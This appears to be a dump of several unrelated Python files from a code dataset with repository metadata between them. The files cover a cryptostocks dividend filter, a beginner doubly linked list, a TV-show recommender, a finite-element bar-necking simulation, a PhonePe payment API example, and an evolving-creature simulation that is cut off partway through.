#self.df['dividend_per_share'] = self.df['total_dividend']/self.df['number_shares']\n\n self.dividend_per_share_total = float(self.df['dividend_per_share'].sum())\n self.number_shares_total = float(self.df['number_shares'].sum())\n self.total_dividend_total = self.df['total_dividend'].sum()\n if self.number_shares_total!=0:\n self.dividend_per_share_avg = self.total_dividend_total/self.number_shares_total\n else:\n self.dividend_per_share_avg = 0.0 # None\n\n self.dividends_nb = len(self.df)\n\nclass API_Request_get_list_of_securities(API_Request):\n def __init__(self, base_path, api_type='json', flag_download=True):\n api_url = 'get_list_of_securities'\n \n #values = {'currency': 'BTC'}\n values = {} # all currencies\n \n API_Request.__init__(self, base_path, api_url, values, api_type, flag_download=flag_download)\n \n self.update()\n \n self.convert_to_DataFrame()\n \n #print(self.df)\n self.df.index = self.df['ticker'] # use ticker as index\n #self.df = self.df.set_index(self.df['ticker'])\n \n #['ticker', 'name', 'currency', 'number_public_shares', 'highest_bid', 'lowest_ask', 'last_price', 'volume_24h', 'volume_7d', 'volume_30d']\n self.df['lowest_ask'] = np.nan\n self.df['highest_bid'] = np.nan\n \n self.df['dividend_per_share'] = np.nan\n self.df['dividends_nb'] = 0\n \n if args.days!=None:\n days = int(args.days)\n else:\n days = 30\n\n if args.daysoffset!=None:\n daysoffset = int(args.daysoffset)\n else:\n daysoffset = 0\n \n for ticker in self.tickers():\n print(\"=\"*10 + \" \" + ticker + \" \" + \"=\"*10)\n \n security_info = API_Request_get_security_info(base_path, ticker, api_type, flag_download)\n security_info.update()\n \n #print(\"=\"*10 + \" \" + ticker + \" (\" + security_info.data['currency'] + \") \" + \" \" + \"=\"*10)\n \n print(\"currency: {currency}\".format(currency=security_info.data['currency']))\n #print(\"name: {name}\".format(name=security_info.data['name'])) # ToFix: \n \n #print(\"{name} ({currency})\".format(\n # name = security_info.data['name'],\n # currency = security_info.data['currency']\n #))\n \n try:\n lowest_ask = float(security_info.data['lowest_ask'])\n except:\n lowest_ask = None\n #print(\"lowest_ask={val}\".format(val=lowest_ask))\n self.df['lowest_ask'][ticker] = lowest_ask\n\n try:\n highest_bid = float(security_info.data['highest_bid'])\n except:\n highest_bid = None\n #print(\"highest_bid={val}\".format(val=highest_bid))\n self.df['highest_bid'][ticker] = highest_bid\n \n print(\"\")\n \n dividend_for_security = API_Request_get_dividend_for_security(base_path, ticker, days, daysoffset, api_type, flag_download)\n dividend_for_security.update()\n print(dividend_for_security.df)\n #dividend_for_security.to_excel()\n print('')\n print(\"dividend_per_share_total={dividend_per_share_total}\".format(dividend_per_share_total=dividend_for_security.dividend_per_share_total))\n print(\"dividend_per_share_avg={dividend_per_share_avg}\".format(dividend_per_share_avg=dividend_for_security.dividend_per_share_avg))\n #print(\"dividend_per_share={val}\".format(val=dividend_per_share))\n self.df['dividend_per_share'][ticker] = dividend_for_security.dividend_per_share_total\n self.df['dividends_nb'][ticker] = dividend_for_security.dividends_nb\n \n print(\"\")\n\n print(\"\")\n print(\"=\"*15 + \" \" + \"SUMMARY\" + \" \" + \"=\"*15)\n\n self.df = self.df.rename(columns={\n 'lowest_ask': 'ask',\n 'highest_bid': 'bid'\n })\n \n #print(self.df)\n \n # Calculate\n self.df['SpreadRelPC'] = 200.0 * (self.df['ask'] - self.df['bid']) / (self.df['ask'] + self.df['bid'])\n \n self.df['DividendPerPricePC'] = self.df['dividend_per_share']/self.df['ask'] * 100.0\n self.df['DividendPerPricePC'] = self.df['DividendPerPricePC'].fillna(0.0)\n\n # URL\n #self.df['url'] = self.df.index\n #self.df['url'] = 'https://cryptostocks.com/securities/' + self.df['url']\n \n # Filter\n if args.currency!=None:\n self.df = self.df[self.df['currency']==args.currency]\n\n if args.onlywithdividend:\n self.df = self.df[self.df['dividend_per_share']>0]\n\n if args.onlywithask:\n self.df = self.df[self.df['ask']>0]\n\n if args.maxspreadrel != None:\n self.df = self.df[self.df['SpreadRelPC'] <= float(args.maxspreadrel)]\n \n # Sort\n self.df = self.df.sort('DividendPerPricePC', ascending=True)\n \n df = self.df[['name', 'currency', 'ask', 'bid', 'dividends_nb', 'dividend_per_share', 'SpreadRelPC', 'DividendPerPricePC']]\n print(df)\n \n filename = os.path.join(self.base_path, \"data_out/data.xls\")\n self.df.to_excel(filename)\n \n\n #filename = os.path.join(self.base_path, \"data_out/data_{days}.csv\".format(days=days))\n #self.df.to_csv(filename)\n #filename = os.path.join(self.base_path, \"data_out/data_{days}.xls\".format(days=days))\n #self.df.to_excel(filename)\n\n def convert_to_DataFrame(self):\n if self.data['return_code']==0:\n try:\n self.df = pd.DataFrame(self.data['securities'])\n except:\n raise(Exception(\"Can't convert to DataFrame\"))\n \n else:\n raise(Exception(\"return_code!=0\"))\n\n def tickers(self):\n for ticker in self.df['ticker']:\n yield ticker\n\nclass CryptoStocksFilter:\n def __init__(self, args): \n self.args = args\n \n flag_download = not self.args.nodownload\n api_req = API_Request_get_list_of_securities(args.basepath, api_type='json', flag_download=flag_download)\n api_req.to_excel()\n \n if args.printraw:\n api_req.pretty_print()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Use the following parameters')\n parser.add_argument('--nodownload', action=\"store_true\", help=\"use this flag to avoid downloading orderbook (will use a previously downloaded file)\")\n parser.add_argument('--printraw', action=\"store_true\", help=\"use this flag to pretty print raw data\")\n #parser.add_argument('--printsecu', action=\"store_true\", help=\"use this flag to print securities\")\n parser.add_argument('--onlywithdividend', action=\"store_true\", help=\"use this flag to filter securities that send dividend\")\n parser.add_argument('--onlywithask', action=\"store_true\", help=\"use this flag to filter securities with ask price\")\n parser.add_argument('--maxspreadrel', action=\"store\", help=\"use this flag to filter securities with relative spread lower than maxspread %\")\n parser.add_argument('--currency', action=\"store\", help=\"use this flag to select a currency (BTC, LTC, DVC...)\")\n parser.add_argument('--days', action=\"store\", help=\"use this flag to select days duration for dividend calculation\")\n parser.add_argument('--daysoffset', action=\"store\", help=\"use this flag to select days offset for dividend calculation\")\n args = parser.parse_args()\n \n args.basepath = os.path.dirname(__file__)\n \n stocks = CryptoStocksFilter(args)\n","repo_name":"c0indev3l/crypto-stocks-tools","sub_path":"cryptostocks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39231267937","text":"class Node:\n \n ''' Class To create a node object for the linked list '''\n \n def __init__(self, item):\n ''' __init__ method to initialize the Node Object '''\n self.item = item\n self.next = None\n self.previous = None \n \n\nclass d_LinkedList:\n \n ''' Class to create a doubly linked list '''\n \n def __init__(self):\n \n ''' __init__ method to initialize the head of the linked-list '''\n \n self.head = None\n \n def push(self, item):\n \n ''' Method to perform a push operation on the linked-list '''\n \n newNode = Node(item)\n newNode.next = self.head\n if self.head is not None:\n self.head.prev = newNode\n self.head = newNode\n \n def __len__(self, node):\n \n ''' Method to get the number of elements in the linked list '''\n \n while node != None:\n counter += 1\n last = node\n node = node.next\n \n return counter\n \n def insert(self, item, prevNode):\n \n ''' Method to insert an element in the linked list '''\n \n if prevNode is None:\n return \n \n newNode = Node(item)\n prevNode.next = newNode\n newNode.prev = prevNode\n \n if newNode.next is not None:\n newNode.next.prev = newNode\n \n def getLis(self, node):\n \n ''' Method to print out the list '''\n \n while node is not None:\n print(node.data, end = ' ')\n last = node\n node = node.next\n \n def append(self, item,):\n \n ''' Method to append an element/item in the linked list '''\n \n newNode = Node(item)\n newNode.next = None\n \n if self.head == None:\n newNode.prev, self.head = None, newNode\n \n last = self.head\n \n while last.next != None:\n last = last.next\n \n last.next = newNode\n newNode.prev = last\n return \n","repo_name":"fermihacker/DataStructures","sub_path":"ClassFiles/Doubly_Linked_List.py","file_name":"Doubly_Linked_List.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72234738728","text":"# Collaborative Filtering\nimport numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('ratingUser.csv',delimiter=',',index_col=0,)\ndf.fillna(0,inplace=True)\nprint(df)\n\n# Correlation\n'''\npearson : standard correlation coefficient\nkendall : Kendall Tau correlation coefficient\nspearman : Spearman correlation coefficient\n'''\ndfCorr = df.corr() # default:pearson\n# print(df_corr)\n\n# testing\npreferensiSaya = [\n ('kartun_a',4),\n ('sinetron_b',1)\n]\n\nskor_sama = pd.DataFrame()\nfor produk, rating in preferensiSaya:\n skor = dfCorr[produk] * (rating-2.5) # standarisasi dengan nilai median 2.5, karena nilai rating netral adalah 2.5\n skor = skor.sort_values(ascending = False) # sorting dataseries yg diambil dari besar ke kecil\n skor_sama = skor_sama.append(skor,ignore_index=False) # tambahkan kedalam satu dataframe\n print(skor_sama)\n \nprint(skor_sama.sum().sort_values(ascending=False)) # jumlahkan kedua hasil masukkan korelasi kemudian menampilkannya dalam ranking rekomendasi\nmixRating=skor_sama.sum().sort_values(ascending=False)\nprint(mixRating[mixRating.values>0].index.values) # rekomendasi untuk rating korelasi di atas 0\nacaraRecommend=mixRating[mixRating.values>0].index.values\nfor i in range(0,len(preferensiSaya)):\n acaraRecommend=acaraRecommend[acaraRecommend!=preferensiSaya[i][0]] # merekomendasikan acara yang belum ditonton\nprint('Acara TV yang mungkin anda suka adalah:',', '.join(acaraRecommend))","repo_name":"agammsantos/Data-Science-Class-Purwadhika","sub_path":"pertemuan46/pertemuan46collab.py","file_name":"pertemuan46collab.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29171781644","text":"import numpy as np\nimport pandas as pd\nfrom pandas import Series, DataFrame\n\n#Selecting and retrieving data\nseries_obj = Series(np.arange(8), index=['row 1', 'row 2', 'row 3', 'row 4', 'row 5', 'row 6', 'row 7', 'row 8'])\n\nseries_obj\nseries_obj['row 7']\nseries_obj[[0,4]]\n\nnp.random.seed(5)\nDF_obj = DataFrame(np.random.rand(36).reshape((6,6)), index=['row 1', 'row 2', 'row 3', 'row 4', 'row 5', 'row 6'],\n columns=['column1', 'column2', 'column3', 'column4', 'column5', 'column6'])\nDF_obj\n\nDF_obj.iloc[[0, 2], DF_obj.columns.get_indexer(['column2', 'column3'])]","repo_name":"stephengequt/IFN645-Pancake","sub_path":"Stephen/Ex_Files_Python_Data_Science_EssT/Prac/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34335279748","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nimport seaborn as sns\r\nfrom sklearn import linear_model as lm\r\n\r\ndf=pd.read_csv(r\"C:\\Codes\\Python\\Data\\CarPrice_Assignment_modified.csv\") #Path of Car Dataset\r\nprint(\"PROVIDED DATASET AFTER CLEANING\\n\\n\",df.head(10),\"\\n\\n\")\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(df[['symboling','fueltype','aspiration','doornumber','carbody','drivewheel','enginelocation','wheelbase',\r\n 'enginesize','boreratio','stroke','compressionratio','horsepower','peakrpm','citympg','highwaympg']],\r\n df[['price']],test_size=0.25)\r\n\r\nreg=lm.LinearRegression()\r\nreg.fit(x_train,y_train)\r\n\r\ny_predict=reg.predict(x_test)\r\n\r\nsns.regplot(x = y_test, y = y_predict, scatter_kws = {\"color\": \"blue\"}, line_kws={\"color\": \"red\" }, ci=0)\r\nsns.set_style(\"white\")\r\nprint(\"\\n\\nRegression Plot -\")\r\nplt.xlabel('Predicted', color='white')\r\nplt.ylabel('Truth', color='white')\r\nplt.show()\r\nprint(\"\\n\\nAccuracy= \",(round(reg.score(x_test,y_test)*100,2)),\"%\\n\\n\")\r\n\r\ncorrelation=df.corr()\r\nplt.figure(figsize=(10,10))\r\nprint(\"\\n\\nCorrelation -\")\r\nsns.heatmap(correlation,cbar=True,square=True,fmt='.1f',annot=True,annot_kws={'size':8},cmap='BrBG')\r\n\r\nplt.show()\r\n","repo_name":"TheROCKoManz/Car-Price-Prediction-using-Linear-Regression","sub_path":"Car_Price_Prediction_Linear_Regression.py","file_name":"Car_Price_Prediction_Linear_Regression.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18715455737","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 22 09:43:44 2018\n\n@author: pantale\n\"\"\"\n\nimport dnlPython as dnl\n\n# Parameters of the model\nnbreSaves = 20\nstopTime = 1e-3\nnbrePoints = 1000 \nbottomWidth = 6.35\ntopWidth = 6.413\nheigh = 26.67\nnbElementsWidth = 10\nnbElementsHeigh = 40\nfactor = 1 / 2\ndisplacement = 7\n\n# Material parameters\nyoung = 206000\npoisson = 0.3\ndensity = 7.83e-09\nheatCapacity = 4.6e+08\ntaylorQuinney = 0.9\nA = 806.0\nB = 614.0\nC = 0.0089\nn = 0.168\nm = 1.1\ndepsp0 = 1.0\nTm = 1540.0\nT0 = 20.0\n\ndxWidth = bottomWidth / nbElementsWidth\ndxHeigh = heigh / nbElementsHeigh\nddx = (topWidth - bottomWidth) / bottomWidth / heigh\nspeed = displacement / stopTime\n\n# Creates the main Object\nmodel = dnl.DynELA(\"BarNecking\")\n\n# Creates the Nodes\nnbNodes = 1\nnsAll = dnl.NodeSet(\"NS_All\")\ndxHeigh /= (1 / factor + 1) / 2\ny = 0\nfor j in range (nbElementsHeigh + 1): \n for i in range (nbElementsWidth + 1):\n model.createNode(nbNodes, i * dxWidth * (1 + ddx * y), y, 0)\n model.add(nsAll, nbNodes)\n nbNodes += 1\n if (j == nbElementsHeigh/2): dxHeigh /= factor\n y += dxHeigh\nnbNodes -= 1\nprint(\"Number of nodes created:\", model.getNodesNumber()) \n\n# Creates the Elements\nmodel.setDefaultElement(dnl.Element.ElQua4NAx)\nnbElements = 1\nesAll = dnl.ElementSet(\"ES_All\")\nfor j in range (nbElementsHeigh):\n for i in range (nbElementsWidth):\n n1 = (i + (j * (nbElementsWidth + 1)) + 1)\n n2 = (i + (j * (nbElementsWidth + 1)) + 2)\n n3 = (i + ((j + 1) * (nbElementsWidth + 1)) + 2)\n n4 = (i + ((j + 1) * (nbElementsWidth + 1)) + 1)\n model.createElement(nbElements, n1, n2, n3, n4)\n model.add(esAll, nbElements)\n nbElements += 1\nnbElements -= 1\nprint(\"Number of elements created:\", model.getElementsNumber()) \n\ntopNS = dnl.NodeSet(\"NS_Top\")\nmodel.add(topNS, nbNodes-nbElementsWidth, nbNodes)\n\nbottomNS = dnl.NodeSet(\"NS_Bottom\")\nmodel.add(bottomNS, 1, nbElementsWidth + 1)\n\naxisNS = dnl.NodeSet(\"NS_Axis\")\nmodel.add(axisNS, 1, nbNodes, nbElementsWidth + 1)\n\nhistRad = dnl.NodeSet(\"NS_HistRadius\")\nmodel.add(histRad, 1 + nbElementsWidth)\n\nhistES = dnl.ElementSet(\"ES_Hist\")\nmodel.add(histES, 1)\n\n# Creates the hardening law\nhardLaw = dnl.JohnsonCookLaw()\nhardLaw.setParameters(A, B, C, n, m, depsp0, Tm, T0)\n\n# Creates the material\nsteel = dnl.Material(\"Steel\")\nsteel.setHardeningLaw(hardLaw)\nsteel.youngModulus = young\nsteel.poissonRatio = poisson\nsteel.density = density\nsteel.heatCapacity = heatCapacity\nsteel.taylorQuinney = taylorQuinney\nsteel.initialTemperature = T0\n\n# Finaly link the material to the structure\nmodel.add(steel, esAll)\n\n# Declaration of a boundary condition for bottom line\nbottomBC = dnl.BoundaryRestrain('BC_bottom')\nbottomBC.setValue(0, 1, 1)\nmodel.attachConstantBC(bottomBC, bottomNS)\n\n# Declaration of a boundary condition for axis line\naxisBC = dnl.BoundaryRestrain('BC_axis')\naxisBC.setValue(1, 0, 1)\nmodel.attachConstantBC(axisBC, axisNS)\n\n# Declaration of a ramp function to apply the load\nramp = dnl.RampFunction(\"constantFunction\")\nramp.setFunction(dnl.RampFunction.Constant, 0, stopTime)\n\n# Declaration of a boundary condition for top line\nspeedBC = dnl.BoundarySpeed('BC_speed')\nspeedBC.setValue(0, displacement, 0)\nspeedBC.setFunction(ramp)\nmodel.attachConstantBC(speedBC, topNS)\n\nsolver = dnl.Explicit(\"Solver\")\nsolver.setTimes(0, stopTime)\nmodel.add(solver)\nsolver.setTimeStepMethod(solver.PowerIteration)\n#solver.setTimeStepSafetyFactor(0.6)\nmodel.setSaveTimes(0, stopTime, stopTime / nbreSaves)\n\n# Declaration of the history files\nvonMisesHist = dnl.HistoryFile(\"vonMisesHistory\")\nvonMisesHist.setFileName(dnl.String(\"vonMises.plot\"))\nvonMisesHist.add(histES, 0, dnl.Field.vonMises)\nvonMisesHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(vonMisesHist)\n\nplasticStrainHist = dnl.HistoryFile(\"plasticStrainHistory\")\nplasticStrainHist.setFileName(dnl.String(\"plasticStrain.plot\"))\nplasticStrainHist.add(histES, 0, dnl.Field.plasticStrain)\nplasticStrainHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(plasticStrainHist)\n\ntemperatureHist = dnl.HistoryFile(\"temperatureHistory\")\ntemperatureHist.setFileName(dnl.String(\"temperature.plot\"))\ntemperatureHist.add(histES, 0, dnl.Field.temperature)\ntemperatureHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(temperatureHist)\n\ninternalEnergyHist = dnl.HistoryFile(\"internalEnergyHistory\")\ninternalEnergyHist.setFileName(dnl.String(\"internalEnergy.plot\"))\ninternalEnergyHist.add(histES, 0, dnl.Field.internalEnergy)\ninternalEnergyHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(internalEnergyHist)\n\nradiusHist = dnl.HistoryFile(\"radiusHistory\")\nradiusHist.setFileName(dnl.String(\"radius.plot\"))\nradiusHist.add(histRad, dnl.Field.nodeCoordinateX)\nradiusHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(radiusHist)\n\ndtHist = dnl.HistoryFile(\"dtHistory\")\ndtHist.setFileName(dnl.String(\"dt.plot\"))\ndtHist.add(dnl.Field.timeStep)\ndtHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(dtHist)\n\nkeHist = dnl.HistoryFile(\"keHistory\")\nkeHist.setFileName(dnl.String(\"ke.plot\"))\nkeHist.add(dnl.Field.kineticEnergy)\nkeHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(keHist)\n\n# Parallel computation\nmodel.parallel.setCores(4)\n\nmodel.solve()\n\nsvg = dnl.SvgInterface(\"SVG\")\nsvg.setTitleDisplay(False)\nsvg.setLegendPosition(350, 150)\nsvg.write(dnl.String(\"temperatureCP.svg\"),dnl.Field.temperature)\nsvg.write(dnl.String(\"vonMisesCP.svg\"),dnl.Field.vonMises)\n\n# Plot the results as curves\nimport dnlCurves as cu\ncurves = cu.Curves()\ncurves.plotFile('Curves.ex')\n","repo_name":"pantale/DynELA-v3.0","sub_path":"Samples/BarNecking/BarNecking-Axi/BarNecking.py","file_name":"BarNecking.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"29999841715","text":"import datetime\r\nimport json\r\nimport phonepe_api\r\n\r\nenv = 'UAT' # Choose the environment first between UAT / Production\r\n\r\nphonepe_api.set_environment(env) # Possible values are UAT or PROD\r\n\r\n\"\"\" Your credentials go here. \r\nYou can get the UAT credentials from here : \r\nhttps://developer.phonepe.com/docs/test-credentials\r\nYou can get the production credentials by following the link below :\r\nhttps://developer.phonepe.com/docs/merchant-onboarding\r\n\"\"\"\r\n\r\nphonepe_api.MERCHANT_ID = 'Merchantid'\r\nphonepe_api.STORE_ID = 'test_store'\r\nphonepe_api.TERMINAL_ID = 'test_terminal'\r\n\r\napi_keys = {\r\n '1': 'key1',\r\n '2': 'key2'\r\n}\r\n\r\nphonepe_api.API_KEYS.update(api_keys)\r\n\r\ncustomer_mobile_number = '1234567890'\r\nsalt_key_index = '1'\r\nnew_transaction_id = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") # Setting the current date and time as orderId, for example\r\n\r\nresponse = phonepe_api.make_qrinit_request(100, new_transaction_id, salt_key_index)\r\n#response = phonepe_api.make_charge_request(100, new_transaction_id, customer_mobile_number, salt_key_index)\r\n#response_content = json.loads(response.content)\r\n#if response_content['success'] is True:\r\n# providerReferenceId = json.loads(response.content)['data']['providerReferenceId']\r\n\r\n#response = phonepe_api.make_status_request(new_transaction_id, salt_key_index)\r\n\r\n#response = phonepe_api.make_cancel_request(new_transaction_id,salt_key_index)\r\n#response = phonepe_api.make_refund_request(new_transaction_id, providerReferenceId, salt_key_index)\r\n#response = phonepe_api.make_status_request(new_transaction_id, salt_key_index)\r\n","repo_name":"ankitdaf/phonepe_api_examples","sub_path":"Python/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"13082942813","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom matplotlib import animation\nimport statistics as stat\nimport csv\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n\n\ndef create_brain():\n # Define your neural network model here\n model = Sequential()\n model.add(Dense(5, input_dim=4, activation='relu'))\n model.add(Dense(2, activation='linear'))\n return model\n\nclass Creature:\n def __init__(self, x, y, speed, movement_type, energy=100, map_width=100, map_height=100, brain=None):\n self.x = x\n self.y = y\n #self.speed = speed\n self.speed = Gene(speed, 0.1, 0.1)\n self.movement_type = movement_type\n self.energy = energy\n self.map_width = map_width\n self.map_height = map_height\n self.dead = False\n self.age = 0\n self.hasTarget = False\n self.target = []\n\n\n # Create a brain if none is provided\n if brain is None:\n self.brain = create_brain()\n else:\n self.brain = brain\n\n def observe(self, food):\n # Your logic to observe food here\n pass\n\n\n def decide_movement(self, food):\n # Your logic to decide movement here\n \n # The input to the brain should be a 1D array with 4 elements,\n # representing the x and y positions of the creature and the food\n brain_input = np.array([self.x, self.y, food.x, food.y]) # fill in with the actual values\n\n # The output of the brain is a 1D array with 2 elements,\n # representing the desired x and y components of the creature's movement\n target = self.brain.predict(np.array([brain_input]),verbose=0)[0] # note the extra [] around brain_input\n self.hasTarget = True\n\n return target\n\n pass\n\n def decide_direction(self, target):\n\n target_theta = np.arctan2(target[1]-self.y, target[0]-self.x)\n target_distance = np.sqrt((target[1]-self.y)**2 + (target[0]-self.x)**2)\n return target_theta, target_distance\n\n\n def rand_move(self):\n if self.movement_type == 'linear':\n \n self.x = self.x + np.random.uniform(-self.speed.value, self.speed.value)\n self.y = self.y + np.random.uniform(-self.speed.value, self.speed.value)\n \n elif self.movement_type == 'angular':\n angle = np.random.uniform(0, 2 * np.pi)\n \n self.x += self.speed.value * np.cos(angle)\n self.y += self.speed.value * np.sin(angle)\n \n # Keep creature within bounds\n self.x = max(0, min(self.x, self.map_width))\n self.y = max(0, min(self.y, self.map_height))\n\n self.energy -= 1\n if self.energy <= 0:\n self.dead = True\n\n def intentional_move(self, target_theta, target_distance):\n self.x = self.x + self.speed.value * np.cos(target_theta)\n self.y = self.y + self.speed.value * np.sin(target_theta)\n \n # Keep creature within bounds\n self.x = max(0, min(self.x, self.map_width))\n self.y = max(0, min(self.y, self.map_height))\n\n self.energy -= 1\n if self.energy <= 0:\n self.dead = True\n\n def eat(self, food):\n # Your logic to eat food and gain energy here\n target = self.decide_movement(food)\n targ_theta, targ_dist = self.decide_direction(target)\n self.intentional_move(targ_theta, targ_dist)\n\n pass\n\n def reproduce(self):\n # Your logic to reproduce and split into two here\n pass\n\n def mutate(self):\n # Call gene mutation functions\n self.speed.mutate()\n pass\n\n\nclass Food:\n def __init__(self, x, y, energy=20):\n self.x = x\n self.y = y\n self.energy = energy\n\nclass Gene:\n def __init__(self, value, mutation_rate, mutation_probability):\n self.value = value\n self.mutation_rate = mutation_rate\n self.mutation_probability = mutation_probability\n # print(\"in gene\")\n # print(self.value)\n\n def mutate(self):\n if np.random.choice([True, False], p=[self.mutation_probability, 1-self.mutation_probability]):\n self.value += np.random.normal(scale=(self.value * self.mutation_rate))\n # print(\"Mutated, Value: \" + str(self.value))\n\nclass Simulation:\n #def __init__(self, width, height, num_creatures, num_food, ticks, generations):\n def __init__(self, width, height, initial_food, initial_creatures, food_energy, creature_speed_variance,\n food_spawn_rate, ticks, generations, max_food,creature_avg_speed,eat_radius,see_radius, plot, write_csv, csv_loc):\n self.width = width\n self.height = height\n self.creatures = []\n self.food = []\n self.ticks = ticks\n self.generations = generations\n self.current_tick = 0\n self.current_generation = 1\n self.max_food = max_food # Maximum amount of food that can be present in the map \n self.food_energy = food_energy # Energy that each food gives to a creature\n self.food_spawn_rate = food_spawn_rate # How often food spawns in ticks\n self.total_tick = 0 # Total ticks that have passed\n self.creature_avg_speed = creature_avg_speed # Average speed of creatures\n self.eat_radius = eat_radius # Radius in which creatures can eat food\n self.see_radius = see_radius # Radius in which creatures can see food\n\n self.plotAnimation = plot # Boolean to determine whether to plot animation or not\n self.write_csv = write_csv # Boolean to determine whether to write to csv or not\n self.csv_loc = csv_loc # Locaiton of csv file to write to\n self.writtenwaiter = False # Boolean to make sure it writes only once\n \n\n self.meanspeed = [] # mean value of speeds of creatures in the simulation\n self.pop_stats = [] # List to store population count\n self.food_stats = [] # List to store food count\n self.tick_stats = [] # List to store tick count\n\n for _ in range(initial_creatures):\n creature = Creature(np.random.uniform(0, self.width), np.random.uniform(0, self.height), \n np.random.uniform(creature_avg_speed-(creature_speed_variance/2), creature_avg_speed+(creature_speed_variance/2)), random.choice(['linear', 'angular']),\n map_width=self.width, map_height=self.height)\n\n self.creatures.append(creature)\n\n for _ in range(initial_food):\n food = Food(np.random.uniform(0, self.width), np.random.uniform(0, self.height))\n self.food.append(food)\n\n def run(self):\n #fig, ax = plt.subplots()\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax3 = ax2.twinx()\n ax4 = ax2.twinx()\n #fig2, ax2 = plt.subplots()\n ax2.set_xlabel(\"Time (ticks)\")\n ax2.set_ylabel(\"Count\")\n ax2.set_title(\"Population and Food over Time\")\n\n pop_line, = ax2.plot([], [], label='Population')\n food_line, = ax2.plot([], [], label='Food')\n ax2.legend()\n\n def animate(i):\n ax1.clear()\n ax2.clear()\n ax3.clear()\n ax4.clear()\n\n self.current_tick += 1\n if self.current_tick > self.ticks:\n self.current_tick = 0\n self.current_generation += 1\n\n new_creatures = []\n \n for creature in self.creatures:\n \n if (creature.age != 0) & (creature.hasTarget == False):\n creature.rand_move()\n\n # Check if creature is near food\n for food in self.food:\n distance = np.sqrt((creature.x - food.x)**2 + (creature.y - food.y)**2)\n\n # Check if the creature can see the food\n if distance < self.see_radius:\n creature.eat(food)\n\n\n # If creature is near food, it eats it and gains energy\n if distance < self.eat_radius: # You can adjust this value as needed\n creature.energy += food.energy\n creature.hasTarget = False\n self.food.remove(food) # Remove food from simulation\n\n # Your logic here to reproduce\n # Check if creature has enough energy to reproduce\n if creature.energy >= 150:\n # Create a new creature at the same location\n offspring = Creature(creature.x, creature.y, creature.speed.value, creature.movement_type, energy=75, map_width=self.width, map_height=self.height)\n offspring.mutate()\n # print(\"Born\")\n # print(offspring.speed.value)\n new_creatures.append(offspring)\n\n # Divide energy between parent and offspring\n creature.energy = 75\n \n creature.age += 1\n \n # Add the new creatures to the simulation\n self.creatures.extend(new_creatures)\n\n \n\n # Also handle mutation here\n\n # Remove dead creatures\n self.creatures = [creature for creature in self.creatures if not creature.dead] \n\n # Add your logic here to spawn food every n ticks\n\n # Spawn food every n ticks, up to maximum amount\n if self.current_tick % self.food_spawn_rate == 0 and len(self.food) < self.max_food:\n self.food.append(Food(np.random.uniform(0, self.width), np.random.uniform(0, self.height), self.food_energy))\n\n creature_x = [creature.x for creature in self.creatures]\n creature_y = [creature.y for creature in self.creatures]\n ax1.scatter(creature_x, creature_y, c='blue')\n\n # Record stats\n self.total_tick += 1\n\n self.meanspeed.append(stat.mean([obj.speed.value for obj in self.creatures]))\n self.tick_stats.append(self.total_tick)\n self.pop_stats.append(len(self.creatures))\n self.food_stats.append(len(self.food))\n\n # Write out stats every 1000 ticks\n\n \n if self.plotAnimation:\n # annotate the energy levels\n for creature in self.creatures:\n ax1.annotate(f\"{creature.energy:.1f}\", (creature.x, creature.y))\n\n food_x = [food.x for food in self.food]\n food_y = [food.y for food in self.food]\n ax1.scatter(food_x, food_y, c='red')\n\n ax1.set_title(f\"Epoch: {self.current_generation}, Tick: {self.current_tick}, Population: {len(self.creatures)}, Food: {len(self.food)}\")\n\n ax1.set_xlim(0, self.width)\n ax1.set_ylim(0, self.height)\n\n # Only plot the last 1000 data points if available\n if len(simulation.tick_stats) >= 10:\n plothist = min(self.total_tick,1000)\n ax2.plot(self.tick_stats[-plothist:], self.pop_stats[-plothist:], label='Population')\n ax3.plot(self.tick_stats[-plothist:], self.food_stats[-plothist:], label='Food', color='red')\n ax4.plot(self.tick_stats[-plothist:], self.meanspeed[-plothist:], label='meanSpeed', color = 'green')\n \n #show y labels\n ax2.set_ylabel(\"Population\")\n ax3.set_ylabel(\"Food\")\n\n #set y axis color\n ax2.tick_params(axis='y', colors='blue')\n ax3.tick_params(axis='y', colors='red')\n ax4.tick_params(axis='y', colors='green')\n\n ax2.set_ylim(0, max(self.pop_stats)+2)\n ax3.set_ylim(0, max(self.food_stats)+2)\n\n \n if self.total_tick % 1000 == 50:\n self.writtenwaiter = False\n\n if self.write_csv & (self.total_tick % 1000 == 0) & (not self.writtenwaiter):\n data = {\n \"tick\": self.tick_stats[-1000:],\n \"population\": self.pop_stats[-1000:],\n 